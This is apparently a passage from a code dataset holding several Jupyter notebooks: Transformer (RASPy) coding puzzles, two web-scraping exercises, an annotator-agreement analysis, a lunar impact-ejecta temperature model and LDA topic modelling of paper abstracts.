id=\"e9e822cb\"\n# This notebook is a collection of short coding puzzles based on the internals of the Transformer. The puzzles are written in Python and can be done in this notebook. After completing these you will have a much better intutive sense of how a Transformer can compute certain logical operations. \n#\n# These puzzles are based on [Thinking Like Transformers](https://arxiv.org/pdf/2106.06981.pdf) by Gail Weiss, Yoav Goldberg, Eran Yahav and derived from this [blog post](https://srush.github.io/raspy/).\n\n# + [markdown] id=\"8e962052\"\n# ## Goal\n#\n# **Can we produce a Transformer that does basic addition?**\n#\n# i.e. given a string \"19492+23919\" can we produce the correct output? \n\n# + [markdown] id=\"d332140b\"\n# ## Rules\n#\n# Each exercise consists of a function with a argument `seq` and output `seq`. Like a transformer we cannot change length. 
Operations need to act on the entire sequence in parallel. There is a global `indices` which tells use the position in the sequence. If we want to do something different on certain positions we can use `where` like in Numpy or PyTorch. To run the seq we need to give it an initial input. \n\n# + id=\"6c5c885a\"\n# %%capture\n# !pip install -qqq git+https://github.com/chalk-diagrams/chalk git+https://github.com/srush/RASPy \n\n# + id=\"51724e11\"\nfrom IPython.display import display, HTML\nfrom raspy import key, query, tokens, indices, where, draw\nimport random\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 96} id=\"1b28dc98\" outputId=\"f1ac1157-3db8-40c0-dbb2-7d9bad8943a0\"\ndef even_vals(seq=tokens):\n \"Keep even positions, set odd positions to -1\"\n x = indices % 2\n # Note that all operations broadcast so you can use scalars.\n return where(x == 0, seq, -1)\nseq = even_vals()\n\n# Give the initial input tokens\nseq.input([0,1,2,3,4])\n\n# + [markdown] id=\"9dc23f88\"\n# The main operation you can use is \"attention\". You do this by defining a selector which forms a matrix based on `key` and `query`.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 176} id=\"e2ee0ff8\" outputId=\"a61ac19c-2550-4f3c-d653-50c323cdfd59\"\nbefore = key(indices) < query(indices)\nbefore\n\n# + [markdown] id=\"a4de0a14\"\n# We can combine selectors with logical operations.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 201} id=\"c315ba6d\" outputId=\"270d50fa-649c-438b-8606-d3d078478162\"\nbefore_or_same = before | (key(indices) == query(indices))\nbefore_or_same\n\n\n# + [markdown] id=\"00bc66a3\"\n# Once you have a selector, you can apply \"attention\" to sum over the grey positions. For example to compute cumulative such we run the following function. \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 326} id=\"e79c8c8b\" outputId=\"44db7f90-502d-497c-c5ba-4062c09f0a9a\"\ndef cumsum(seq=tokens):\n return before_or_same.value(seq)\nseq = cumsum()\nseq.input([0, 1, 2, 3, 4])\n\n# + cellView=\"form\" id=\"9ae57559\"\n#@title Test Code (Collapse)\ndef atoi(seq=tokens):\n return seq.map(lambda x: ord(x) - ord('0'))\n\ndef test_output(user, spec, token_sets):\n for ex_num, token_set in enumerate(token_sets): \n out1 = user(*token_set[:-1])((token_set[-1]))\n out2 = spec(*token_set)\n print(f\"Example {ex_num}. Args:\", token_set, \"Expected:\", out2)\n display(out1)\n out1 = out1.toseq()\n for i, o in enumerate(out2):\n assert out1[i] == o, f\"Output: {out1} Expected: {out2}\"\n\n pups = [\n \"2m78jPG\",\n \"pn1e9TO\",\n \"MQCIwzT\",\n \"udLK6FS\",\n \"ZNem5o3\",\n \"DS2IZ6K\",\n \"aydRUz8\",\n \"MVUdQYK\",\n \"kLvno0p\",\n \"wScLiVz\",\n \"Z0TII8i\",\n \"F1SChho\",\n \"9hRi2jN\",\n \"lvzRF3W\",\n \"fqHxOGI\",\n \"1xeUYme\",\n \"6tVqKyM\",\n \"CCxZ6Wr\",\n \"lMW0OPQ\",\n \"wHVpHVG\",\n \"Wj2PGRl\",\n \"HlaTE8H\",\n \"k5jALH0\",\n \"3V37Hqr\",\n \"Eq2uMTA\",\n \"Vy9JShx\",\n \"g9I2ZmK\",\n \"Nu4RH7f\",\n \"sWp0Dqd\",\n \"bRKfspn\",\n \"qawCMl5\",\n \"2F6j2B4\",\n \"fiJxCVA\",\n \"pCAIlxD\",\n \"zJx2skh\",\n \"2Gdl1u7\",\n \"aJJAY4c\",\n \"ros6RLC\",\n \"DKLBJh7\",\n \"eyxH0Wc\",\n \"rJEkEw4\"]\n print(\"Success!\")\n return HTML(\"\"\"\n \n \"\"\"%(random.sample(pups, 1)[0]))\nSEQ = [2,1,3,2,4]\nSEQ2 = [3, 4 ,3, -1, 2]\n\n\n# + [markdown] id=\"57d753ac\"\n# For each problem we will provide a Python specification. 
Your goal is to implement that specification with Transformers.\n\n# + [markdown] id=\"77441886\"\n# ### Challenge 0: Select the initial position\n#\n# Given a initial sequence compute a new sequence where all positions have the initial value. (1 line)\n\n# + id=\"1da74d03\"\ndef head_spec(seq):\n return [seq[0] for _ in seq]\n\ndef head(seq=tokens):\n return (key(indices) == query(0)).value(seq)\n \ntest_output(head, head_spec, [(SEQ,),(SEQ2,)])\n\n\n# + [markdown] id=\"f565d61c\"\n# ### Challenge 1: Select a given index\n#\n# Produce a sequence where all the elements have the value at index `i`.\n\n# + id=\"10d1b909\"\ndef index_spec(i, seq):\n return [seq[i] for _ in seq]\n\ndef index(i, seq=tokens):\n raise NotImplementedError\n\ntest_output(index, index_spec, [(2, SEQ), (3, SEQ2), (1, SEQ)])\n\n# + [markdown] id=\"a6c2b47d\"\n# ### Challenge 2: Shift\n#\n# Shift all of the tokens in a sequence to the right by `i` positions filling in the values with `default`. (1 line)\n\n# + id=\"d9b5db79\"\ndef shift_spec(i, default=\"0\", seq=None):\n return [default]*i + [s for j, s in enumerate(seq) if j < len(seq) - i]\n\ndef shift(i, default=\"0\", seq=tokens):\n raise NotImplementedError\n\ntest_output(shift, shift_spec, [(2, 0, SEQ), (3, 0, SEQ2), (1, 0, SEQ)])\n\n# + [markdown] id=\"3f87e538\"\n# ### Challenge 3: Right Align\n#\n# Right align a padded sequence e.g. ralign().inputs('xyz___') = '000xyz'\" (3 layers) (2 lines)\n\n\n# + id=\"a841d6f4\"\ndef ralign_spec(ldefault=\"0\", seq=tokens):\n last = None\n for i in range(len(seq)-1, -1, -1):\n if seq[i] == \"_\":\n last = i\n else:\n break\n if last == None:\n return seq\n return [ldefault] * (len(seq) - last) + seq[:last]\n\ndef ralign(ldefault=\"0\", seq=tokens):\n raise NotImplementedError\n\ntest_output(ralign, ralign_spec, [(\"-\", list(\"xyzabc__\"),), (\"0\", list(\"xyz___\"),)])\n\n# + [markdown] id=\"a178203a\"\n# ### Challenge 4: Split\n#\n# Split a sequence on a value. Get the first or second part. Right align. (5 lines)\n\n# + id=\"e69995ed\"\ndef split_spec(v, get_first_part, seq):\n out = []\n mid = False\n blank = \"0\" if not get_first_part else \"_\"\n for j, s in enumerate(seq):\n if s == v:\n out.append(blank)\n mid = True\n elif (get_first_part and not mid) or (not get_first_part and mid):\n out.append(s)\n else:\n out.append(blank)\n return ralign_spec(\"0\", seq=out)\n\ndef split(v, get_first_part, seq=tokens):\n raise NotImplementedError\n\ntest_output(split, split_spec,\n [(\"-\", 1, list(\"xyz-ax\"),),\n (\"-\", 0, list(\"xyz-ax\"),),\n (\"+\", 0, list(\"xy+z-ax\"),)]\n )\n\n# + [markdown] id=\"f9d19ecd\"\n# ### Challenge 5: Minimum \n#\n# Compute the minimum value of the sequence. This one starts to get harder! (5 lines of code)\n\n# + id=\"53b19ac8\"\ndef minimum_spec(seq):\n m = min(seq)\n return [m for _ in seq]\n\ndef minimum(seq=tokens):\n raise NotImplementedError\n\ntest_output(minimum, minimum_spec, [(SEQ,), (SEQ2,), ([2, 1, 1],)])\n\n# + [markdown] id=\"6d2fe8ec\"\n# ### Challenge 6: First Index\n#\n# Compute the first index that has token `token`. 
(1 line)\n\n# + id=\"a4a6a030\"\ndef first_spec(token, seq):\n first = None\n for i, s in enumerate(seq):\n if s == token and first is None:\n first = i\n return [first for _ in seq]\n\ndef first(token, seq=tokens):\n raise NotImplementedError\n\ntest_output(first, first_spec, [(3, SEQ), (-1, SEQ2), ('l', list('hello'))])\n\n# + [markdown] id=\"38236f00\"\n# ### Challenge 7: Slide\n#\n# Replace special tokens \"<\" with the closest non \"<\" value to their right. (4 lines of code)\n\n# + id=\"7781c97c\"\ndef slide_spec(match, seq):\n out = []\n for i, s in enumerate(seq):\n if s == \"<\":\n for v in seq[i+1:]:\n if v != \"<\":\n out.append(v)\n break\n else:\n out.append(s)\n return out\n\ndef slide(match=\"<\", seq=tokens):\n raise NotImplementedError\n\ntest_output(slide, slide_spec,\n [(\"<\", list(\"1<<2\"),),\n (\"<\", list(\"2<<<3\"),),\n (\"<\", list(\"3<<<1<<3\"),)]\n )\n\n# + [markdown] id=\"6be44511\"\n# ### Final Challenge: Adder\n#\n# Now we will put everything together. Here are the steps. \n#\n# add().input(\"683+345\")\n#\n# 0) Split into parts. Convert to ints. Add\n#\n# > \"683+345\" => [0, 0, 0, 9, 12, 8]\n#\n# 1) Compute the carry terms. Three possibilities: 1 has carry, 0 no carry, < maybe has carry. \n#\n# > [0, 0, 0, 9, 12, 8] => \"00<100\"\n#\n# 2) Slide the carry coefficients\n#\n# > \"00<100\" => 001100\"\n#\n# 3) Complete the addition.\n#\n# Each of these is 1 line of code. \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 96} id=\"11b27d5b\" outputId=\"b1224ef6-c889-40ab-f051-fd00e37ceb2a\"\n# The function atoi lets us convert from string to sequences of integers\natoi(tokens).input(\"1321\")\n\n\n# + id=\"3370d2c8\"\ndef add_spec(seq):\n a, b = \"\".join(seq).split(\"+\")\n c = int(a) + int(b)\n out = f\"{c}\"\n return list(map(int, list((\"0\" * (len(seq) - len(out))) + out)))\n\n\n# + id=\"98a331c6\"\ndef add(seq=tokens):\n x = atoi(split(\"+\", True, seq)) \\\n + atoi(split(\"+\", False, seq))\n # 1) Check for carries \n gets_carry = shift(-1, \"0\", where(x > 9, \"1\", where(x == 9, \"<\", \"0\")))\n # 2) Slide carries to their columns - all in one parallel go! \n gets_carry = atoi(slide(\"<\", gets_carry))\n # 3) Add in carries, and remove overflow from original addition. \n return (x + gets_carry) % 10\n\n\n# + id=\"7f1f708c\"\ntest_output(add, add_spec,\n [(list(\"1+2\"),),\n (list(\"22+384\"),),\n (list(\"3+10\"),)]\n )\n","repo_name":"srush/Transformer-Puzzles","sub_path":"TransformerPuzzlers.ipynb","file_name":"TransformerPuzzlers.ipynb","file_ext":"py","file_size_in_byte":10473,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"39308922557","text":"# # Word cloud on Project descriptions\n#\n# Generating a word cloud from the descriptions of the live [DataCamp Projects](https://datacamp.com/projects/). We will have to first scrape them and then use them to generate the word cloud. Let's begin. 
\n\n# +\n# Dependencies\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\n\n# %matplotlib inline\n\n# +\n# The main URL where all the project names and their descriptions can be found\nroot_url = 'https://www.datacamp.com/projects/'\n\n# Necessary for scrapping\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \\\nChrome/71.0.3578.98 Safari/537.36'}\n\n# +\n# Begin the scrapping process\ndescriptions = []\n\nproject_data = requests.get(root_url, headers=headers)\nsoup = BeautifulSoup(project_data.text, 'html.parser')\nres = soup.find_all('small', attrs={'class': 'dc-project-block__description'})\n\nfor entry in res:\n descriptions.append(entry.get_text())\n\ndescriptions_df = pd.DataFrame(data = descriptions, columns = ['project_description'])\n# -\n\ndescriptions_df.head()\n\n# ## Duplicates shall not pass\n\ndescriptions_df.drop_duplicates(inplace=True)\n\n# ## Word cloud with the first description\n\n# +\n# Start with the first description :)\ntext = descriptions_df.project_description[0]\n\n# Create and generate a word cloud image\nwordcloud = WordCloud().generate(text)\n\n# Display the generated image\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\n# -\n\n# Tweak some of the arguments to give it an elegant look\nwordcloud = WordCloud(max_font_size=50, max_words=5, background_color=\"white\").generate(text)\nplt.figure()\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()\n\n# Does not make much sense up until now. Let's take the remaining the descriptions and merge in a big DataFrame.\n\ntext = \" \".join(description for description in descriptions_df.project_description)\nprint (\"There are {} words in the merging of all the descriptions.\".format(len(text)))\n\n# ## Combining the descriptions\n\n# +\n# Create stopword list\nstopwords = set(STOPWORDS)\nstopwords.update(['bees']) # Might be good idea to discard this word\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n\n# Construct and display the generated image\nplt.figure(figsize=(15,15))\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\n# -\n\n# ## Masking the word cloud according to the DataCamp logo\n\n# ![](https://cdn.datacamp.com/main-app/assets/brand/logos/DataCamp_Icon_RGB-a3afe004da4a462151b8e87a89937603ea50534f338d4600cb11043a9cc434c9.png)\n\n# Load in the Datacamp logo to use as mask\ndatacamp_logo = np.array(Image.open(\"image/DataCamp_Logo.png\"))\ndatacamp_logo\n\n\n# These pixel intensities (0-valued) won't serve good as a mask image. 
We will have to convert it to 255.\n\ndef transform_pixels(pixel):\n if pixel == 0:\n return 255\n else:\n return pixel\n\n\n# +\n# Transform the mask into a new one that will work with the function\ntransformed_pixels = np.ndarray((datacamp_logo.shape[0],datacamp_logo.shape[1]), np.int32)\n\nfor i in range(len(datacamp_logo)):\n transformed_pixels[i] = list(map(transform_pixels, datacamp_logo[i]))\n\n# +\n# Reconstruct a word cloud\nwc = WordCloud(background_color=\"white\", max_words=1000, mask=transformed_pixels,\n stopwords=stopwords, contour_width=3, contour_color='#4fc3f7')\n\n# Generate a word cloud image\nwc.generate(text)\n\n# Display\nplt.figure(figsize=[20,10])\nplt.imshow(wc, interpolation='bilinear')\nplt.axis(\"off\")\n# -\n\n# Save the image\nwordcloud.to_file(\"image/datacamp_wordcloud.png\")\n","repo_name":"sayakpaul/Generating-Word-Cloud-from-DataCamp-Project-Descriptions","sub_path":"Word cloud on Project descriptions.ipynb","file_name":"Word cloud on Project descriptions.ipynb","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"21132673103","text":"# + [markdown] id=\"oNsy7j_-x9tK\"\n# # Label Comparison\n#\n# **Task:** create an analytical program that compares BEND labeling between two different annotators.\n#\n# **Research Questions:**\n#\n# 1) Are humans good detectors of the maneuvers?\n#\n# 2) Are some maneuvers easier to detect by humans than others?\n#\n# 3) How much overlap is there between labelers? Do they more or less match in what they are labeling?\n#\n# 4) What is the correlation between the maneuvers and the agreement of labels between annotators? Calculate the agreement by maneuver between two coders. Maybe this goes back somewhat to question 2.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"pvo7kJ9nxfd1\" outputId=\"5c0e73ec-01e7-49f4-802b-74775b0e6b34\"\n# setting up drive for data import\n\nimport os\nimport tarfile\nimport urllib\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\nimport pandas as pd\n\nDATASET_PATH = \"/content/drive/MyDrive/Completed\"\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iVygq0vNZuuG\" outputId=\"a69afcf0-0259-473f-aebd-5d4b010525b9\"\nfrom sklearn.metrics import cohen_kappa_score\nimport numpy as np\n\n# processing data for calculation, including loading and binarizing\n\nBEND_labels = ['Engage', 'Explain', 'Excite', 'Enhance', 'Dismiss', 'Distort', 'Dismay', 'Distract', 'Back', 'Build', 'Bridge', 'Boost', 'Neutralize', 'Nuke', 'Narrow', 'Neglect', 'NONE']\ncompleted_datasets = [\"CapnMarvel_1_aahmad1.csv\", \"CapnMarvel_1_yucongw.csv\", \"CapnMarvel_2_TPedireddi.csv\", \"CapnMarvel_2_yucongw.csv\", \"Election2020_20201102_4_aahmad1.csv\", \"Election2020_20201102_4_coco.csv\"]\n\ndef load_data(data_path):\n df = pd.read_csv(os.path.join(DATASET_PATH, data_path))\n df[\"maneuver\"] = df[\"maneuver\"].fillna(\"NONE\")\n return df[\"maneuver\"].tolist()\n\ndef binarize(maneuver, data):\n return [1 if maneuver in x else 0 for x in data]\n\n# implementing cohen's kappa\n\ndef calculate_kappa():\n kappas = []\n for x in BEND_labels:\n binarized1 = binarize(x, annotator1)\n binarized2 = binarize(x, annotator2)\n kappas.append(cohen_kappa_score(binarized1, binarized2))\n return kappas\n\ndef overall_agreement(scores):\n return sum(scores) / len(scores)\n\n# calculating annotator agreement through multiple datasets\n\narr_scores = np.zeros(17)\n\nfor i in range(0, 6, 2):\n 
annotator1 = load_data(completed_datasets[i])\n annotator2 = load_data(completed_datasets[i+1])\n arr_scores = np.add(np.array(calculate_kappa()), arr_scores)\n\narr_scores /= len(completed_datasets) / 2\n\n# printing results\n\nprint(\"Annotator agreement by maneuver:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], arr_scores[i]))\nprint(f'Overall agreement between both annotators: {overall_agreement(arr_scores)}')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Yj5o4bkTvG0b\" outputId=\"5544ec6b-96c1-4482-9c8a-2f8049de5ca5\"\n# calculating frequencies of maneuvers in the datasets\n\ntotal_frequencies = np.zeros(17)\n\ndef frequency(annotations):\n maneuver_frequencies = []\n for x in BEND_labels:\n binarized = binarize(x, annotations)\n maneuver_frequencies.append(sum(binarized))\n return maneuver_frequencies\n\nfor i in range(0, 6):\n total_frequencies = np.add(total_frequencies, frequency(load_data(completed_datasets[i])))\n\nprint(\"Frequency of maneuvers:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], total_frequencies[i]))\n\npercentages = np.divide(total_frequencies, sum(total_frequencies))\npercentages = np.multiply(percentages, 1000)\n\nprint(\"Percent frequency of maneuvers:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], percentages[i]))\n\n# + [markdown] id=\"0QI8Vju2-tq-\"\n# # Interpreting Cohen's kappa\n#\n# `<0`: no agreement\n#\n# `0-0.20`: slight agreement\n#\n# `0.21-0.40`: fair agreement\n#\n# `0.41-0.60`: moderate agreement\n#\n# `0.61-0.80`: substantial agreement\n#\n# `0.81-1`: perfect agreement\n","repo_name":"viridescentavian/BEND-annotator-agreement","sub_path":"Annotator_Agreement.ipynb","file_name":"Annotator_Agreement.ipynb","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"34884945711","text":"# #!pip install beautifulsoup4\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\n\n# +\n#classics\nurl = 'http://books.toscrape.com/catalogue/category/books/science-fiction_16/index.html'\n \nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'}\npage = requests.get (url, headers=headers)\n\nsoup = BeautifulSoup (page.text, 'html.parser')\n# -\n\nbooks = soup.find('ol', class_='row')\n#books_list = products.find_all('li', class_='col-xs-6 col-sm-4 col-md-3 col-lg-3')\n\n# +\n#name\nbooks_list = books.find_all('a')\nbooks_name = [p.get('title') for p in books_list]\nbooks_name = list(filter(None, books_name))\ndf_name = pd.DataFrame(books_name, columns = ['name'])\n\ndf_name\n\n# +\n#rating\nbooks_list = books.find_all('p', class_='star-rating')\nbooks_rating = [p.get('class') for p in books_list]\nrates = []\nfor i in range(len(books_rating)):\n rates.append(books_rating[i][1])\ndf_rate = pd.DataFrame(rates, columns=['rating'])\n\ndf_rate\n\n# +\n#price\nbooks_list = books.find_all( 'p', class_='price_color' )\nbooks_price = [p.get_text().replace('Â','') for p in books_list]\ndf_price = pd.DataFrame(books_price, columns = ['price'])\n\ndf_price\n\n# +\n#availability\nbooks_list = books.find_all( 'p', class_='instock availability' )\nbooks_available = [p.get_text().replace('\\n','') for p in books_list]\ndf_available = pd.DataFrame(books_available, columns = ['availability'])\n\ndf_available\n\n# +\n#classics dataframe\ndf_classics 
= pd.DataFrame([books_name, rates, books_price, books_available]).T\ndf_classics.columns = ['name', 'price', 'rating', 'availability']\n\ndf_classics\n","repo_name":"HenriqueCR1291/star_jeans","sub_path":"m01_books_scrape.ipynb","file_name":"m01_books_scrape.ipynb","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"73075262508","text":"# # Fernandes and Artemieva (2012) LPSC abstract\n#\n# Modeled Imbrium impact shock, ejecta temps vs distance for \"ancient-cold-moon\" and \"present-hot-moon\".\n#\n# Fig 4 shows thickness and temp vs distance for a 100 km diameter impactor.\n#\n# Imbrium assumed to have a 769 km transient crater diameter\n\n# +\nimport numpy as np\nimport matplotlib.pyplot as plt\ndiam = 769 # [km]\nT0 = 235 # [K]\nT0_cold = 260#210 # [K] Fig 4. proximal, cold\nT0_hot = 420#290 # [K] Fig 4. proximal, hot\ndt_hot = 15 # [K/km]\ndt_cold = 2 # [K/km]\ndepth = np.linspace(0, diam/10, 1000)\nT_hot = T0 + dt_hot * depth\nT_cold = T0 + dt_cold * depth\nplt.plot(depth, T_hot, 'r', label='Hot')\nplt.plot(depth, T_cold, 'b', label='Cold')\n\nd_cold = depth[np.argmin(np.abs(T_cold - T0_cold))]\nd_hot = depth[np.argmin(np.abs(T_hot - T0_hot))]\nplt.axvline(d_cold, color='b', linestyle='--')\nplt.axvline(d_hot, color='r', linestyle=':')\nplt.xlabel('Depth [km]')\nplt.ylabel('Temperature [K]')\nplt.legend()\n# -\n\ndepth = np.arange(80)\ndt_hot = 25 # [K/km]\ndt_cold = 10 # [K/km]\nT_hot = T0 + dt_hot * depth\nT_cold = T0 + dt_cold * depth\nplt.plot(depth, T_hot, 'r', label='Hot')\nplt.plot(depth, T_cold, 'b', label='Cold')\n\n# +\nfrom moonpies import moonpies as mp\nfrom moonpies import config\ncfg = config.Cfg()\n\nfig, ax = plt.subplots(figsize=(5, 5))\ndf = mp.get_crater_basin_list()\n\nd_imb = 769*1e3 # [m] Imbrium, basin diam used in Fernandes and Artemieva\nd_crater = df[~df.isbasin].diam.max() # [m] largest non-basin crater\nd_basin_max = df[df.isbasin].diam.max() # [m] largest basin\n\ndist = np.linspace(d_imb, d_imb*7)\nfor diam, label in zip((d_imb, d_crater), ('Imbrium', 'Crater')): \n dist_crad = dist / (diam/2)\n thick = mp.get_ejecta_thickness(dist.reshape(1, -1), np.atleast_1d(diam/2), cfg).squeeze()\n mass = thick * cfg.target_density # [kg/m^2]\n vel = mp.ballistic_velocity(dist, cfg)\n\n # Use only kinetic energy in excess of ke_heat_frac_speed\n v_excess = vel - cfg.ke_heat_frac_speed\n v_excess[v_excess < 0] = 0\n\n # Get KE and scale by fraction converted to heat\n heat_frac = cfg.ke_heat_frac\n ke = heat_frac * mp.kinetic_energy(mass, v_excess)\n\n # Get temps and plot\n x = dist.squeeze() / 1e3 # [km]\n if label == 'Crater':\n t0_c = cfg.polar_ejecta_temp_init\n dt_c = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_c, cfg))\n t_dist = t0_c + dt_c\n end = np.argmin(np.abs(dist_crad - 20)) # 10 crater radii\n ax.plot(x[:end], t_dist[:end], '-', c='tab:orange', label='Crater')\n else:\n t0_cold = cfg.basin_ejecta_temp_init_cold\n t0_warm = cfg.basin_ejecta_temp_init_warm \n dt_cold = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_cold, cfg))\n dt_warm = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_warm, cfg))\n t_dist_cold = t0_cold + dt_cold\n t_dist_warm = t0_warm + dt_warm\n ax.plot(x, t_dist_cold, '-', c='tab:blue', label='Basin cold')\n ax.plot(x, t_dist_warm, '-', c='tab:red', label='Basin warm')\n \nax.axvline(4*d_imb / 2e3, c='gray', ls='-.')\nax.axvline(4*d_basin_max / 2e3, c='k', ls='-.')\nax.set_xlabel('Distance 
[km]')\nax.set_ylabel('Temperature [K]')\nax.set_xlim(750, 6000)\n# ax.set_ylim(140, 600)\n\n# Points for Imbrium from Fig. 4, Fernandes and Artemieva (2012)\nfernandes_dist = np.array([1400, 2040, 2825, 3675, 4500, 5200])\nfernandes_cold = np.array([260, 260, 300, 350, 480, 500])\nfernandes_warm = np.array([420, 420, 440, 460, 540, 600])\nax.plot(fernandes_dist, fernandes_warm, 'ro-', label='Fernandes warm')\nax.plot(fernandes_dist, fernandes_cold, 'bo-', label='Fernandes cold')\n\n# Fit to Fernandes and Artemieva (2012)\ncrad = fernandes_dist / (d_imb/2)\nxrad = x / (d_imb/2)\npcb, pca = np.polyfit(fernandes_dist, np.log(fernandes_cold), 1)\n# ax.plot(x, np.exp(pca+xrad*pcb), 'b--', label='Fernandes cold fit')\n\npcold = np.polyfit(crad, fernandes_cold, 2)\nfcold = np.poly1d(pcold)\nax.plot(x, fcold(xrad), 'b--', label='Fernandes cold fit')\nprint(f'basin_ejecta_temp_params_cold: {np.array2string(pcold, precision=3)}')\n\npwarm = np.polyfit(crad, fernandes_warm, 2)\nfwarm = np.poly1d(pwarm)\nax.plot(x, fwarm(xrad), 'r--', label='Fernandes warm fit')\nprint(f'basin_ejecta_temp_params_warm: {np.array2string(pwarm, precision=3)}')\n\n# axb = ax.twinx()\n# axb.plot(x, thick, 'k--', label='Ejecta thickness')\n# axb.set_ylabel('Ejecta thickness [m]')\n# axb.set_ylim(100, 500)\nax.legend()\nplt.show()\n","repo_name":"cjtu/moonpies","sub_path":"notebooks/bsed_temp_fernandes_artemieva.ipynb","file_name":"bsed_temp_fernandes_artemieva.ipynb","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"2478626155","text":"import json\nfrom tqdm.notebook import tqdm\nfrom collections import Counter\n\nfilename = \"correct.txt\"\n\ndata = []\n\nwith open(filename, \"r\") as fin:\n for line in tqdm(fin):\n obj = json.loads(line)\n \n if \"abstract\" in obj and \"year\" in obj:\n if obj[\"year\"] > 2020:\n data.append(obj[\"abstract\"])\n\nlen(data)\n\n# +\nimport nltk\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('omw-1.4')\nfrom nltk.corpus import stopwords, wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom string import punctuation\nimport re\nenglish_stopwords = stopwords.words(\"english\")\nlemmatizer = WordNetLemmatizer()\n\n\ndef pos_tagger(nltk_tag):\n if nltk_tag.startswith('J'):\n return wordnet.ADJ\n elif nltk_tag.startswith('V'):\n return wordnet.VERB\n elif nltk_tag.startswith('N'):\n return wordnet.NOUN\n elif nltk_tag.startswith('R'):\n return wordnet.ADV\n else:\n return None\n\n\n# Удаление знаков пунктуации из текста\ndef remove_punct(text):\n table = {33: ' ', 34: ' ', 35: ' ', 36: ' ', 37: ' ', 38: ' ', 39: ' ', 40: ' ', 41: ' ', 42: ' ', 43: ' ', 44: ' ', 45: ' ', 46: ' ', 47: ' ', 58: ' ', 59: ' ', 60: ' ', 61: ' ', 62: ' ', 63: ' ', 64: ' ', 91: ' ', 92: ' ', 93: ' ', 94: ' ', 95: ' ', 96: ' ', 123: ' ', 124: ' ', 125: ' ', 126: ' '}\n return text.translate(table)\n\ndef preprocess(data):\n data = map(lambda x: x.lower(), data)\n data = map(lambda x: remove_punct(x), data)\n data = map(lambda x: re.sub(r'\\d+', ' ', x), data)\n \n data = map(lambda x: x.split(' '), data)\n data = map(lambda x: [token for token in x if token not in english_stopwords\\\n and token != \" \" \\\n and token.strip() not in punctuation], data)\n \n data = map(lambda x: ' '.join(x), data)\n \n data = list(data)\n \n result = []\n for every in tqdm(data):\n pos_tagged = nltk.pos_tag(nltk.word_tokenize(every))\n 
wordnet_tagged = list(map(lambda x: (x[0], pos_tagger(x[1])), pos_tagged))\n\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n lemmatized_sentence.append(word)\n else:\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))\n lemmatized_sentence = \" \".join(lemmatized_sentence)\n\n result.append(lemmatized_sentence)\n \n return result\n\n\n# -\n\nclean_data = preprocess(data)\n\nlen(clean_data)\n\nimport pickle\n\nwith open(\"clean_data_abstract.pkl\", \"wb\") as fout:\n pickle.dump(clean_data, fout)\n\n# ### LDA\n\nlist_of_list_of_tokens = list(map(lambda x: x.split(' '), clean_data))\n\nfor i in range(len(list_of_list_of_tokens)):\n list_of_list_of_tokens[i] = list(filter(lambda x: len(x) > 3, list_of_list_of_tokens[i]))\n\n# +\nfrom gensim import corpora, models\n\ndictionary_LDA = corpora.Dictionary(list_of_list_of_tokens)\ndictionary_LDA.filter_extremes(no_below=3)\ncorpus = [dictionary_LDA.doc2bow(list_of_tokens) for list_of_tokens in list_of_list_of_tokens]\n# -\n\nnum_topics = 20\n# %time lda_model = models.LdaModel(corpus, num_topics=num_topics, \\\n# id2word=dictionary_LDA, \\\n# passes=4, alpha=[0.01]*num_topics, \\\n# eta=[0.01]*len(dictionary_LDA.keys()))\n\nfor i, data in lda_model.show_topics(num_topics=20, formatted=False):\n for word, p in sorted(data, key=lambda x: x[1], reverse=True):\n print(f\"{word}\", end=\" \")\n print(\"\\n---------\")\n\nlda_model.save('lda.model')\n\n# 